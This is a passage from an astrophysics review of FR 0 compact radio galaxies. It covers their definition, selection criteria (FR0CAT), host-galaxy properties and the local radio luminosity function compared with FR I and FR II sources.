Sect. 1 and 2 for the definition of the classes). Red and dark-green dashed lines represents the classical evolutionary tracks of FR Is and FR IIs (e.g., An and Baan, 2012). The shaded bottom-right corner shows the effect of surface-brightness limitations by existing radio surveys: very recently, deep LOFAR and MeerKAT surveys are starting to explore this region of the \(P\)—\(D\) diagram (Whittam et al., 2022; Best et al., 2023). The vertical line roughly represents the separation between resolved and unresolved/compact sources based on arcsec angular resolution, generally provided by the VLA array. The black box depicts the VLA detected FR 0s and represents an upper limit on their actual radio physical size. This figure is a modified version of Fig. 2 from Hardcastle and Croston (2020). survey-mode telescopes has unveiled new regions in the space parameters of RLAGN phenomenology (see e.g., in time domain astronomy, radio/optical/X-ray spectroscopy and polarimetry, jet/wind structure, disc and dust properties, Padovani 2016; Padovani et al. 2017; Spinoglio and Fernandez-Ontiveros 2021), which have defined specific accretion-ejection states of AGN and relative transitions, which the simplistic UM cannot explain. Although the UM is still generally valid, the most logical way to relieve the tension is the inclusion of the time variable in the UM, i.e. the parameters can evolve across time. An evolutionary scheme of RLAGN offers a more adaptable method to fine-tune the AGN parameters observed in distinct and transitioning states of accretion and ejections (Antonucci, 2012; Netzer, 2015; Tadhunter, 2016). The dynamic evolution of the accretion-ejection coupling in RLAGN is traditionally explained as a progression of the radio power with the linear size of the radio structure (see An and Baan 2012 and references therein). Figure 1 shows the radio power \(P\) versus the total extent of the source, \(D\) (the so-called "\(P\)--\(D\)" diagram, Baldwin 1982): different populations of radio-emitting AGN (quiet and loud) span over a very wide range in radio luminosities (nearly ten orders of magnitude) and source sizes (six orders of magnitude) (Hardcastle et al., 2019; Hardcastle and Croston, 2020). For RLAGN, in Fig. 1, two representative evolutionary tracks within the \(P\)--\(D\) diagram are shown and predict RL CRSs to evolve into traditional \(\sim\)100-kpc double RGs (FR Is or FR IIs, e.g. Kunert-Bajraszewska et al. 2010; An and Baan 2012; Kunert-Bajraszewska 2016). However, there is an important caveat. All the evolutionary models and our current knowledge on RG populations have long been based on samples of powerful sources, mostly above \(10^{24}\,\mathrm{W\,Hz}^{-1}\), selected from high-flux low-frequency radio surveys such as the Third Cambridge (3C) catalogue (Bennett, 1962). In opposition to the past, recent large-area sensitive surveys have revealed that the local RG population is dominated by sources with radio power below \(10^{24}\,\mathrm{W\,Hz}^{-1}\)(Best and Heckman, 2012), which includes mostly compact FR 0-type RGs. The UM model is not able to successfully reproduce such an abundant population of 'low-luminosity' RLAGN. A milestone in the comprehension of the RLAGN phenomenon is the work by Best et al. (2005), which selected the largest complete sample of low-luminosity RGs (\(\lesssim 10^{41}\,\mathrm{erg\,s}^{-1}\)) by cross-matching Sloan Digital Sky Survey (SDSS, York et al. 2000), National Radio Astronomy Observatory (NRAO) Very Large Array (VLA) Sky Survey (NVSS, Condon et al. 1998), and the Faint Images of the Radio Sky at Twenty centimeters survey (FIRST, Becker et al. 1995) with flux densities \(>5\) mJy a 1.4 GHz. This flux-density cut is much below than the selection of, e.g. the 3C catalogue (178 MHz flux density \(>9\) Jy, Bennett 1962), on which most of our comprehension of the radio-AGN phenomenon is based. The most interesting result from the radio-optical survey is that their radio morphology appears unresolved at the scale of the FIRST radio maps, i.e. \(5^{\prime\prime}\), which corresponds to 10-20 kpc with \(z<0.3\). These compact RGs, named later _FR0s_, which belong to a heterogeneous population of LERG-type red massive ellipticals, represent the bulk of the RG population of the local Universe with a space density \(>100\) times higher than 3C/RGs. The study of the FR 0 population has a relevant role in the modern astrophysics because: i) since they are the most common RLAGN in the local Universe, their comprehension provides an important insight on the accretion-ejection mechanism for ordinary RGs; ii) since their radio emission is on galactic scale, their jets can have a tremendous impact on the galaxy evolution in the context of radio-mode feedback. In this review, we provide an overview of the observational properties and theoretical understanding of this interesting class of compact RGs, FR 0s. We introduce the class of CRSs in Sect. 2 to then focus on the FR 0s (Sect. 3), by discussing their selection (radio and host properties). Then we derive the radio luminosity function of local RGs to demonstrate the abundance of FR 0s with respect to the FR I/IIs (Sect. 4). Then we review their multi-band properties from radio (Sect. 5), optical and IR (Sect. 6) to high energy bands (Sect. 7) to picture their typical spectral energy distribution (SED). A discussion of the accretion-ejection coupling (Sect. 8), environmental properties (Sect. 9) and their role of compact sources in AGN feedback (Sect. 10) lead to drawing static and dynamic scenarios to account for the multi-band properties of FR 0s in relation to the other FR classes (Sect. 11 and 12). A final chapter on future perspective is also included (Sect. 13). We adopt in this work \(H_{0}=70\) km s\({}^{-1}\) Mpc\({}^{-1}\), \(\Omega_{m_{0}}=0.3\), \(\Omega_{A_{0}}=0.7\). ## 2 Compact radio sources In this review we consider CRSs, those AGN which appear unresolved at small angular sizes (\(\lesssim\) a few arcseconds). CRSs can be RQ or RL, and here we will focus on the latter. In RL CRSs, the compact component is generally ascribed to the radio core, which is interpreted as non-thermal self-absorbed synchrotron emission from the base of a relativistic jet, that extracts energy from the spinning BH and/or the accretion disc (Blandford and Znajek, 1977; Blandford and Payne, 1982). The connection between the compact core emission and the pc-kpc-Mpc scale extended jet emission, has been discussed in previous reviews (e.g., Condon and Dressel 1978; O'Dell 1978; Kellermann 1980; Kellermann and Pauliny-Toth 1981; O'Dea 1998; Falcke et al. 2004; Lobanov 2006; Tadhunter 2016b; O'Dea and Saikia 2021), which all gather increasing evidence of a large population of CRSs in the local Universe. _What does 'compact' mean and what defines the compactness?_ The angular size of a compact source can vary from milli-arcsecond (mas) to a few arcseconds depending on the frequency, resolution and depth of observations. There is no a specific limit on the physical scale for a compact source. The morphological compactness can be defined as the 'unresolved' structure of a radio source, when the deconvolved size is smaller or equal to the radio-map beam width and when its visibility function is flat across the entire spatial-frequency plane. Starting with the Rayleigh-Jeans limit for brightness temperature \(T_{b}\) [K] (Condon and Ransom, 2016), the angular dimension \(\theta\) of a compact source with its peak intensity S\({}_{\nu}\) [mJy beam\({}^{-1}\)] at the frequency \(\nu\) [GHz] is \[\theta\sim 35\;\,S_{\nu}^{1/2}\;\,T_{b}^{-1/2}\;\,\nu^{-1}\;\,arcsec. \tag{1}\] For brightness temperatures above the threshold to discriminate between an AGN and stellar origin (Falcke et al., 2000), \(T_{b}\gg 10^{7}\) K, for a spectral peak frequency between hundreds of MHz to GHz, the angular size varies between a few mas to a few arcseconds. This corresponds to a linear dimension range of several hundreds of pc to kpc in the nearby Universe (\(z<0.3\)). However, in the literature, a CRS is trivially classified as a morphologically point-like source based on the corresponding angular resolution. In theory, a conventional definition of a compact source predicts the presence of a characteristic self absorption in the radio spectrum at low frequencies (below GHz regime). A varying opacity throughout the source entails a spectral characterisation: a flat, inverted or undulating spectrum over a wide range of frequencies due to the superposition of several radio-emitting partially opaque sources. Both the generally flat-spectrum and the compactness of the source can lead to the interpretation of an unresolved radio-emitting nucleus. A (flat-spectrum) compact radio core can be observed across all types of galaxies and AGN. Even normal spiral, star forming galaxies, RQAGN and late-type galaxies (LTG) in general can reveal a compact nucleus, whose radio origin is thermal and non-thermal emission from several physical processes (Condon, 1992; Panessa et al., 2019). Since the most radio-loud AGN are preferentially hosted by bulge-dominated evolved galaxies with masses larger than \(10^{11}\,M_{\odot}\) and much less signs of morphological disturbance (spirals, bars) and SF than RQAGN (e.g. Best et al. 2005a; Ho 2008; Best and Heckman 2012; Koziel-Wierzbowska et al. 2017b, a; Magliocchetti 2022), a prior selection of the optical hosts, ETGs rather than LTGs, can help to exclude RQAGN from genuine RL CRS samples at the cost of completeness in the RLAGN population. The presence of an arcsec-scale compact radio emission at the centre of ETGs has been affirmed since '70s as the main results of shallow VLA radio surveys up to now (e.g. Rogstad and Ekers 1969; Heeschen 1970; Ekers and Ekers 1973; Kellermann and Pauliny-Toth 1981; Sadler 1984; Fanti et al. 1986, 1987; Wrobel and Heeschen 1991; Slee et al. 1994; Giroletti et al. 2005; Capetti et al. 2009; Nyland et al. 2016; Hardcastle et al. 2019; Roy et al. 2021; Grossova et al. 2022; Wojtowicz et al. 2023; Capetti and Brienza 2023). More massive galaxies and earlier in type appear to be more probably connected to the presence of a RLAGN (e.g., Smith et al. 1986; Best et al. 2005a; Floyd et al. 2010; Kim et al. 2017; Zheng et al. 2020), able to launch from the weakest to the most powerful jets in the Universe (large range of luminosities, morphologies, duty cycles and speeds, e.g. Heckman and Best 2014; Morganti 2017; Morganti et al. 2021a; Saikia 2022). Hosted in ETGs, RL CRSs have been classified based on radio spectral and morphological properties. Other than blazars which have a large intrinsic radio size but appear compact because of projection effects and are affected by relativistic beaming (one-sidedness, superluminal motions, and high brightness temperatures), misaligned RL CRSs (Readhead et al., 1994; O'Dea, 1998; Orienti, 2016; O'Dea and Saikia, 2021) have been studied mainly at high powers (\(L_{1.4\,\mathrm{GHz}}>10^{25}\,\mathrm{W}\,\mathrm{Hz}^{-1}\)) and are characterised by a convex synchrotron radio spectrum: the peak position around 100 MHz in the case of compact-steep spectrum (CSS) sources (well determined only by LOFAR and MWA observations in the recent years, e.g. Mahony et al. 2016; Callingham et al. 2017; Slob et al. 2022), and at about 1 GHz in the case of GHz-peaked spectrum (GPS) sources, or even up to a few GHz in the sub-population of high frequency peakers (HFP) (Fanti et al., 1985; Spencer et al., 1989; Stanghellini et al., 1998; Snellen et al., 1998; Dallacasa et al., 2000; Kunert et al., 2002; Orienti et al., 2007; Hancock et al., 2010) (Fig. 1). Morphologically, lobes and/or hot spots are typically resolved with very-long baseline interferometry (VLBI) observations and a weak component hosting the core is occasionally present (e.g. Wilkinson et al. 1991; Gugliucci et al. 2005; An et al. 2010, 2012; Wu et al. 2013). Depending on their size, CSS/GPS may be termed as compact symmetric objects (CSO) if they are smaller than 1 kpc, or medium-sized symmetric objects (MSO) if they extend up to 10 - 15 kpc (Conway, 2002; Fanti et al., 2001). The existence of a relation between the rest-frame peak frequency and the projected linear size (e.g. O'Dea and Baum 1997) indicates that the mechanism responsible for the curvature of the spectrum is the youth: these sources are small because they are still in an early stage of their evolution, and will develop into FR I/II sources (e.g., Phillips and Mutel 1982; Fanti et al. 1990; Snellen et al. 2000; An and Baan 2012). The alternative scenarios point to a dense medium which might limit and frustrate the jet growth (van Breugel et al., 1984; Carvalho, 1994, 1998; Ghisellini et al., 2004; Giroletti et al., 2005), or to a short or recurrent activity due to occasional BH accretion (Readhead et al., 1994; Gugliucci et al., 2005; Kunert-Bajraszewska et al., 2010, 2011; An and Baan, 2012; Kiehlmann et al., 2023). In conclusion, the CRS category can embrace a large population of radio-emitting sources: RQAGN, star-forming galaxies, blazars, young RGs and the FR 0s. In the next section, we will focus on the properties of this 'new' class of compact RGs, FR 0s, in relation to the large-scale RLAGN population. ## 3 Low-luminosity CRSs: the FR0s A significant fraction of nearby galaxies shows evidence of weak nuclear activity unrelated to normal stellar processes. Recent high-resolution, multi-wavelength observations indicate that this activity derives from BH accretion with a wide range of accretion rates and is associated with a CRS (e.g., Nagar et al. 2005; Ho 2008; Zuther et al. 2012; Saikia et al. 2018; Williams et al. 2022, 2023). In fact, moving to lower luminosities generally corresponds to selecting AGN with smaller and weaker jet (compact) structures and flatter radio spectra (e.g., Nagar et al. 2005; Sadler et al. 2014; Baldi and Capetti 2010; Gurkan et al. 2018; Sabater et al. 2019; Hardcastle et al. 2019; Dabhade and Gopal-Krishna 2023), but with an increasing contribution from spurious RQAGN (Mezcua and Prieto, 2014; Bonzini et al., 2013; Baldi et al., 2021). Current radio surveys of the local Universe have unearthed a large population of low-luminosity AGN (LLAGN, with bolometric luminosities \(\lesssim\)\(10^{40}\,{\rm erg\,s^{-1}}\)), which were poorly explored in the past. Best and Heckman (2012), up-dating the sample of Best et al. (2005), select 18,286 RGs (the SDSS/NVSS sample, hereafter), with low powers (\(L_{1.4\,{\rm GHz}}<10^{24}\,{\rm W\,Hz}^{-1}\)) at low redshifts (\(z<0.3\)), whose the majority (\(\sim\)80%) are LLAGN and radio compact (\(5\arcsec\)), with linear sizes \(\lesssim\)10-20 kpc. The role of LLAGN and their compact jet emission in galaxy-BH co-evolution (Ho, 2008; Kormendy and Ho, 2013) is crucial for several aspects: i) since LLAGN outnumber the quasar population by a few orders of magnitudes at \(z<0.3\)(Nagar et al., 2005; Best et al., 2005; Saikia et al., 2018), they provide the snapshot of the ordinary relation between an accreting BH and its host. The absence of an outshining AGN at the galaxy centre allows us to better study the co-evolutionary link between host and BH; ii) since LLAGN reside in less massive galaxies, the identification of LLAGN would help to constrain the occupation fraction of active BH in galaxies at low stellar masses \(>10^{9-10}\,M_{\odot}\)(Greene, 2012; Gallo and Sesana, 2019), and the BH mass density function at \(M_{\rm BH}<10^{8}\,M_{\odot}\). These quantities are fundamental to calibrate the prescriptions for BH-galaxy growth of semi-analytical and numerical models (e.g., Shankar 2009; Barausse et al. 2017); iii) due to the lack of sensitive surveys in the past, the role of LLAGN in galaxy evolution has been always downgraded with respect to powerful quasars, which by definition can offer a larger energetic budget to the host. Yet, recently the advent of deep radio surveys is reversing our view on AGN activity: LLAGN are always switched on at some level at low radio powers (\(L_{150\,{\rm MHz}}\gtrsim 10^{21}\) W Hz\({}^{-1}\), Sabater et al. 2019) and have galactic-scale jets, that can have a tremendous impact on their hosts by continuously injecting energy into the host, a crucial aspect for the jet-mode (or radio-mode) feedback (Fabian, 2012). While in the optical band the role of LLAGN in BH-galaxy co-evolution and their BH accretion properties have been largely studied (Ho, 2008; Fanidakis et al., 2011), their connection with the radio band has recently started to be explored. The past and current optical-radio studies of radio-emitting LLAGN collect observational evidence that three states of accretion-ejection exist: RQ Seyferts, RQ LINERs and RL LINERs (Low-Ionization Nuclear Emission line Regions, Hine and Longair 1979; Heckman 1980; Kewley et al. 2006), different from the accretion-ejection states at higher luminosities, LERGs and HERGs and RQ quasars4. LINERs have lower accretion rates (\(\dot{m}\)), are usually more radio-loud and reside in earlier type galaxies than Seyferts (Ho, 2008). In fact, LINERs tend to host compact cores (Cohen et al., 1969; Falcke et al., 2000; Filho et al., 2002b; Maoz, 2007), more radio luminous as the BH mass (or galaxy mass) increases (e.g. Laor 2000; Best et al. 2005b; Mauch and Sadler 2007). RQ LINERs and Seyferts exhibit sub-relativistic and not collimated jets (e.g., Ulvestad et al. 1999; Wrobel 2000; Ulvestad and Ho 2001a; Gallimore et al. 2006; Singh et al. 2015b; Baldi et al. 2021b). Conversely, RL LINERs have been generally interpreted as the scaled-down version of powerful RLAGN in terms of accretion and jet luminosities (Chiaberge et al., 2005; Balmaverde and Capetti, 2006a). The nuclei of RL LINERs can be described with a model of synchrotron self-absorbed base of a low-power (mildly) relativistic jet coupled with an underluminous RIAF disc (typically an ADAF, Narayan and Yi 1994b), analogous to FR I/LERG disc-jet coupling (e.g. Balmaverde and Capetti 2006b; Hardcastle et al. 2009). The low-power CRS population selected from the SDSS/NVSS sample (Best and Heckman, 2012) in the same luminosity range (\(\lesssim\)10\({}^{41}\) erg s\({}^{-1}\)) of classical 3C/FR Is includes a heterogeneous population of mostly LINER/LERGs5 with a broad distribution of BH mass and host properties. Footnote 5: LERG and RL LINER are equivalent classes at low luminosities. Baldi et al. (2010) analysed in detail the photometric and spectroscopic properties of the SDSS/NVSS sample to select the bona-fide RLAGN population (see Sect. 3.1). They found that the majority of the SDSS/NVSS sample (\(\sim\) 80%) consists of compact LERGs, that are characterised by a total jet power up to a factor \(\sim\)1000 lower than what expected by RGs with bolometric AGN luminosity similar to those of the 3C/FR Is (\(\sim\) 10\({}^{40}\) erg s\({}^{-1}\)). This remarkable result that the local Universe is dominated by low-luminosity CRSs lacking of substantial extended emission, expresses the need to include these sources in the taxonomy of RGs. Ghisellini (2011) for the first time introduced in the literature the name _FR 0_ to characterise a population of weak RL CRSs hosted in ellipticals, named Core Galaxies6 (CoreG), which exhibit radio core and AGN bolometric luminosities similar to the weakest 3C/FR Is (M87), but with an extended radio emission hundreds of times weaker (Baldi and Capetti, 2009). CoreG host genuine'miniature' RGs with LINER-like nuclei, which extend the nuclear luminosity correlations reported for 3C/FR Is by a factor of \(\sim\)1000 toward lower luminosities (Balmaverde and Capetti, 2006a; Kharb et al., 2012): this has been interpreted as a sign of a common central engine (RIAF disc) (Balmaverde and Capetti, 2006a; Kharb et al., 2012). CoreG are characterised by kpc-scale jets and a deficit of total radio emission in analogy to the SDSS/NVSS sample, but at lower radio luminosities. Footnote 6: The Core Galaxy nomenclature comes from the (core-type) optical flat surface brightness profile in innermost region of an ETG (e.g. Faber et al. 1997). In analogy to CoreG, the FR 0 classification (see Sect. 3.1) does not correspond to a pure radio morphological selection of CRSs, but also includes an optical identification (host and AGN properties) to separate the genuine FR 0s which are all RLAGN, from spurious RQAGN and star forming galaxies (bluer LTGs with emission line ratios consistent with Seyfert or SF and steeper radio spectra, Baldi et al. 2016). A closer look at the FR 0s at sub-arcsec/mas scale revealed that the majority still appears radio compact, with a flat spectrum in the GHz band (Baldi et al., 2015, 2019; Cheng and An, 2018; Cheng et al., 2021). However, a small fraction of those exhibits kpc/pc-scale core-brightened jets, suggesting that FR 0s can actually produce collimated structures. The lack of substantially extended radio emission at kpc scale and the spectral flatness for the majority of these CRSs have led to the affirmation of the FR 0 nomenclature as a unique class of genuine compact RGs different from the other RLAGN classes. In conclusion, in the last decade, different parallel studies have brought to light a revolutionary result, i.e. classical 3C FR I/ IIs do not represent Figure 2: Multi-band composite panel of RGs. On the top two examples of typical radio morphologies of a FR I (Cen A, Burns et al. 1983 at 1.4 GHz) and a FR II (3C 285, Alexander and Leahy 1987 at 1.4 GHz). On the bottom, we show an example of FR 0. The left panel displays the r-band SDSS image of the ETG which hosts the FR 0 with the blue VLA 4.5-GHz radio contours (Baldi et al., 2019) (3 kpc scale set by the green arrow). The right panel represents the high-resolution zoom on the radio core (on the scale of 3 pc) provided by the VLBI image from Cheng and An (2018). Image reproduced with permission from Baldi et al. (2019), copyright by the authors. the ordinary picture of the RLAGN phenomenon in the local Universe, but FR 0-like LLAGN represent the bulk of the local RG population (Fig. 2). The paucity of sources with weak extended radio structures in high flux limited samples (such as in the 3C sample) is due to a selection bias, since the inclusion of such objects is highly disfavored. In fact, in support to this interpretation, Baldi and Capetti (2009) showed that the lower flux threshold of B2 sample (\(<\)250 mJy at 408 MHz, Fanti et al. 1978) drastically reduces the selection bias and allows the inclusion of a larger fraction of core-dominated7 galaxies, consistent with being FR 0s. Footnote 7: The ratio of core to total extended emission (which in general includes the core emission for simplicity) is called the core-dominance parameter (generally the total and core emission measured, respectively, at 1.4 GHz and \(\gtrsim\)5 GHz). Core-dominated galaxies have typically a core dominance \(\gtrsim 1/3\). ### Selection of FR 0s Disentangling bona-fide FR 0s from the radio compact impostors (blazars, young RGs, RQAGN, compact star-forming galaxies) represents a multi-band selection process. This can be harder at low luminosities (mJy-level at \(z<0.3\)). For example, Best et al. (2005b) used several optical photometric and spectroscopic diagnostics and radio properties to select RLAGN in the SDSS/NVSS sample, however a small fraction (\(\sim\)10%) of a possible RQAGN contribution is still present after the selection. Because aligned and young RGs can be removed from the sample only on the basis of a spectral and temporal radio study which are often not available, the simplest method to select bona-fide FR 0 candidates is based on a shallow optical-radio (largely available) selection process which consists of a few steps to maximise the probabilities that the radio emission is associated with a compact RL active nucleus. Accordingly, Baldi et al. (2018) have compiled a catalogue of 104 FR 0 sources (namely, FR0CAT) from the SDSS/NVSS sample, by adopting the following criteria: * nearby (redshift \(z\lesssim 0.05\)) galaxies. * compact: the sources are unresolved in the NVSS maps at 45\({}^{\prime\prime}\) resolution. More stringently, the source must appear unresolved at FIRST resolution, 5\({}^{\prime\prime}\). The FR 0 candidates consist of unresolved sources for which the deconvolved size is smaller than 4\({}^{\prime\prime}\). At \(z=0.05\) this corresponds to \(\sim\)5 kpc, that is, to a radius of 2.5 kpc. * FIRST 1.4-GHz flux density \(>\) 5 mJy to increase the possibility of an accurate size and flux measurement. This value corresponds to \(\sim\)30 times the noise level of the FIRST maps. * LERGs. Selecting LINERs allows the exclusion of AGN with high-Eddington ratios (generally Seyferts/HERGs) and are more probably associated with RLAGN phenomena (Heckman and Best, 2014; Panessa et al., 2019). Follow-up observations at higher angular resolution than that of FIRST maps are needed to confirm whether the FR0CAT sources still remain unresolved at sub-kpc scale. The resulting FR0CAT sample turns out to be a population of RGs with a core dominance of a factor \(\sim\)30 higher than typical 3C/FR Is (Baldi and Capetti, 2009; Baldi et al., 2019; Whittam et al., 2020), where instead the core typically contributes to 1% to the total radio emission (Morganti et al., 1997). Their 1.4-GHz radio luminosities are in the range \(10^{38}-10^{40}\,\rm erg\,s^{-1}\). These radio selections turned out to include mostly luminous (\(-21\gtrsim M_{r}\gtrsim-23\)) red ETGs with BH masses \(10^{7.5}\lesssim M_{\rm BH}\lesssim 10^{9}\,M_{\odot}\)8. However, only a minor fraction of the selected FR 0s departs from this general behavior (galaxies with optical photometric and spectroscopic characteristics, typical of blue star-forming spirals and RQAGN, see Sect. 3.2), although a host (ETG) selection was not part of the selection criteria. Footnote 8: All the BH masses reported in this work for FR0CAT, FRICAT, sFRICAT and FRIICAT objects are derived from SDSS stellar velocity dispersions \(\sigma\) and considering the M\({}_{\rm BH}\)-\(\sigma\) relation of Tremaine et al. 2002. As control samples with respect to the FR0CAT, other catalogues of low-luminosity FR Is and FR II have been selected from the SDSS/NVSS sample, a factor \(\sim\)10-100 weaker than 3C/RGs. Capetti et al. (2017) selected 219 low-luminosity FR Is, named FRICAT, with core-brightened radio morphology, redshift \(\leq\) 0.15, and extending (at the sensitivity of the FIRST images) to a radius (r) larger than 30 kpc from the optical centre of the host. The authors also selected an additional sample (sFRICAT) of 14 smaller (\(10<\) r \(<\) 30 kpc) FR Is, limiting to \(z<0.05\). The distribution of radio luminosity at 1.4 GHz of the FRICAT covers the range \(10^{39}-10^{41.3}\,\rm erg\,s^{-1}\) and the sources are all LERGs. The hosts of the FRICAT sources are all luminous (\(-21\gtrsim Mr\gtrsim-24\)), red ETGs with BH masses in the range, \(10^{8}\lesssim M_{\rm BH}\lesssim 10^{9.5}\,M_{\odot}\), slightly larger than FR0CAT BH masses (Fig. 3). Similarly, Capetti et al. (2017) selected 122 low-luminosity FR IIs, named FRIICAT, with redshift \(\leq\) 0.15, an edge-brightened radio morphology, and those with at least one of the radio emission peaks located at radius r \(>\) 30 kpc from the optical galaxy center. The radio luminosity at 1.4 GHz of the FRIICAT sources covers the range \(10^{39.5}\) -\(10^{42.5}\,\rm erg\,s^{-1}\). The FRIICAT catalog mostly includes LERGs (90%), which are luminous (\(-20\gtrsim Mr\gtrsim-24\)), red ETGs with BH masses in the range \(10^{8}\lesssim M_{\rm BH}\lesssim 10^{9}\,M_{\odot}\). Other FR 0 samples were selected at lower and higher radio frequencies than the FIRST 1.4-GHz band (see Sect. 5 for details), which instead include a larger contamination from spurious sources than the FR0CAT. At low radio frequencies (hundreds of MHz) which is expected to be dominated by optically-thin emission, the vast majority (\(\sim\)70%) of sources in the wide-area LOFAR (Hardcastle et al., 2019; Sabater et al., 2019; Mingo et al., 2019; Capetti et al., 2020) and GMRT Survey (Capetti et al., 2019), and in the deep well-studied field (e.g. ELAIS-N1 and BOOTES, Sirothia et al. 2009; Ishwara-Chandra et al. 2020) appear compact with an angular resolution of a few arcsec and have \(\alpha\) between 0 and 0.85, with the flat-spectrum sources more abundant than the steep-spectrum companions. At higher radio frequencies (tens of GHz) which is expected to be dominated by the optically-thick emission, FR 0s have been selected by Sadler et al. (2014) from the AT20G-6dfGS sample and by Whittam et al. (2016) from the Cambridge 10C survey (mostly \(z<3\)) based on their radio morphological compactness (a few arcsec). Both the samples selected 70-80% of CRSs, which include FR0-like LERGs and a large fraction of possible GPS/CSS sources. In conclusion, the selection of flat-spectrum weak CRSs in red massive hosts still remains the safest way to select bona-fide FR 0s in relation with other compact and extended radio galaxies which can exhibit steeper radio spectra and bluer hosts (see next section). ### Host properties The different radio-frequency selections of the FR 0s lead to a heterogeneous distribution of their host properties (e.g. galaxy type, colour, mass, \(M_{\rm BH}\)): selecting red massive ETGs represents the most secure criterion of identifying hosts of a FR 0. In fact, a prior host selection through several diagnostics can reduce the probability of inclusion of radio-compact impostors. The concentration index \(C_{\rm r}\) is defined as the ratio of the galaxy radii including 90% and 50% of the light in the r band, respectively. ETG have higher values of concentration index than LTG, i.e. \(C_{\rm r}>2.6\)(Strateva et al., 2001). The Dn(4000) spectroscopic index is defined as the ratio between the flux density measured on two sides of the Ca II break (\(\sim\)4000 A) (Balogh et al., 1999) and high values, Dn(4000) \(>1.7\), are generally associated with old stellar populations (\(\gtrsim 1\) Gyr, Hernan-Caballero et al. 2013) and, hence, with red passive galaxies (Best et al., 2005a; Capetti and Raiteri, 2015). Optical and infrared colour can also separate red ellipticals from blue spirals. The combination of these diagnostics with the FR0CAT criteria listed in Sect. 3.1 allows to identify the radio-compact red massive ETGs which have the highest probabilities of hosting a RLAGN. Figure 3: Left panel: BH mass distribution (in M\({}_{\odot}\)) of FR 0s (FR0CAT, blue line) with respect to FR Is (FRICAT, radio size \(>30\) kpc, black line) and small FR Is (sFRICAT, \(10<\) radio size \(<30\) kpc, red line). Right panel: compact (black) and extended RGs (green), when matched in radio core luminosities. Images reproduced with permission from [left] Baldi et al. (2018), copyright by ESO; and from [right] Miraghaei and Best (2017), copyright by the author(s). The vast majority of the FR0CAT, FRICAT and FRIICAT hosts are indistinguishable: red massive ETGs, based on the values of the \(C_{r}\), spectroscopic Dn(4000) indices and broad-band colour. Their redness is confirmed by the photometric \(u-r\) colour, measured over the whole galaxy. The WISE infrared colours further support the general passive nature of the FRCAT hosts (Fig. 4, W1-W2 \(<\) 0.2, Wright et al. 2010). Nonetheless, a few galaxies of the FR0CAT extend to redder colours than those from the FRICAT and there is a notable lack of blue host galaxies (\(u-r>2.5\)) with respect to the general population of ETGs (Schawinski et al., 2009). In addition, the galaxy mass (and BH mass) of FR0CAT sources is on average smaller than those of FRICAT galaxies by a factor \(\sim\)1.4 (Fig. 3), a possible effect of the selection of their lower radio luminosities since radio power and host mass are found to correlate in RL AGN (e.g. Best et al. 2005a; Capetti and Brienza 2023). At high frequencies, Sadler et al. (2014) did not opt for a host selection and, in fact, found that the host galaxies of FR 0s display heterogeneous properties with a wide range in WISE colours, (33% in LTGs with some ongoing SF, see Fig 4). This implies that the selected FR 0 candidates, which make up the majority of the AT20G-6dFGS sample, probably consists of a mixed bag of genuine FR 0s, young RGs and RQAGN. In fact, the bluer colour of the Figure 4: WISE colour-colour plot (W2-W3 vs. W1-W2) for the host galaxies of FR I (red squares), FR II (blue squares) and compact (FR 0, black crosses) radio sources in the 20 GHz AT20G-6dFGS sample from Sadler et al. (2014). The horizontal line at a \(3.4-4.6\mu\)m colour of 0.6 mag divides the AGN and normal galaxy populations. Objects where radiation from an AGN dominates the galaxy spectrum in the mid-infrared are expected to lie above this line, and objects where starlight dominates should lie below the line. The vertical line W2-W3 \(>\)2 identifies LTGs from ETGs. Image reproduced with permission from Sadler (2016), copyright by Wiley-VCH. selected FR 0s is generally attributed to galaxies with a recent SF burst or to young RGs in gas-rich environments. Since the radio core luminosity has been argued to be a better gauge of jet power than total radio luminosity9, Miraghaei and Best (2017) matched a sample of RL CRSs and extended RGs on the basis of the core luminosities. In terms of host properties, they found that CRSs and extended RGs differ only in the BH mass (Fig. 3), similar to the result from the FR0CAT (Baldi et al., 2018). Footnote 9: The radio core power is a measure of instantaneous power, rather than the total radio power, that is an averaged value over time and is also influenced by environment. The combination of the following criteria, i.e. the optical red colour, radio compactness and low radio powers (in mJy-level radio surveys), allows to increase the chances to exclude radio-compact impostors and select mostly massive ETGs which harbour compact RL LLAGN, \(<\)10\({}^{23}\) W Hz\({}^{-1}\)(Best et al., 2005; Sabater et al., 2019; Hardcastle et al., 2019), consistent with a FR 0 classification. Figure 5: The local NVSS luminosity function at 1.4 GHz for RLAGN (pink diamonds) and LERGs (empty squares) from the SDSS/NVSS sample (Best and Heckman, 2012). The lower x-axis is expressed in erg s\({}^{-1}\) and the upper one in W Hz\({}^{-1}\). The other points represent the radio luminosity functions for FR 0s (filled circles), small FR Is (empty red up-warded triangles), FR Is (filled red triangles) and FR IIs (blue filled down-warded triangles) from the FR0CAT (Baldi et al., 2018), sFRICAT/FRICAT (Capetti et al., 2017) and FRICAT (Capetti et al., 2017). The dot, dashed and dot-dashed lines are rough fits of the data-points, respectively, for FR 0s, FR Is, and FR IIs, to better visualize the luminosity functions. ## 4 Radio luminosity function We calculate the radio luminosity functions of the FRCAT sources as object density per unit logarithmic luminosity interval within the maximum volume \(V_{\rm max}\) in which the objects would be observed (Schmidt, 1968; Condon, 1989): \[\Phi\left(\log L_{\rm NVSS}\right)=\frac{4\pi}{\sigma}\sum_{i=1}^{N(\log L_{*} )}\frac{1}{V_{\rm max(i)}}\,, \tag{2}\] where \(\sigma\) is the area of the sky surveyed, \(N\left(\log L_{*}\right)\) is the number of objects in a given NVSS luminosity bin \(L_{*}\), and \(V_{\rm max(i)}\) is given by the limiting magnitudes/fluxes in both the optical and radio properties of the sample, namely a radio cutoff of 5 mJy and SDSS optical cutoff of \(r<18\), as well as any imposed redshift limit for the analysis (\(z<0.05\) for FR0CAT and sFRICAT and \(z<0.15\) for FRICAT and FRIICAT). The sky area of the overlapping region between the SDSS DR7 spectroscopic survey and the FIRST/NVSS radio survey is \(\sigma=2.17\) steradians. We place detected sources in bins of equal radio luminosities and estimate the uncertainties as in Condon (1989). We use Poisson statistics to estimate uncertainties in luminosity bins with small numbers of sources (\(N<7\)). If \(N=1\), we set 1\(\sigma\) upper limit on the luminosity function in that bin. The 1.4-GHz NVSS luminosities functions are derived for the FR 0s, FR Is and FR IIs from the FRCAT in Fig. 5 and tabulated in Table 2. Figure 5 shows that, as expected, FR 0s dominate the radio source population at relatively low radio luminosities \(\lesssim 10^{23.5}\) W Hz\({}^{-1}\), while the FR Is and FR IIs dominate at the highest luminosities. Quantitatively, FR 0s represent the bulk of the RLAGN population of the local Universe (\(z<0.05\)) with a space density 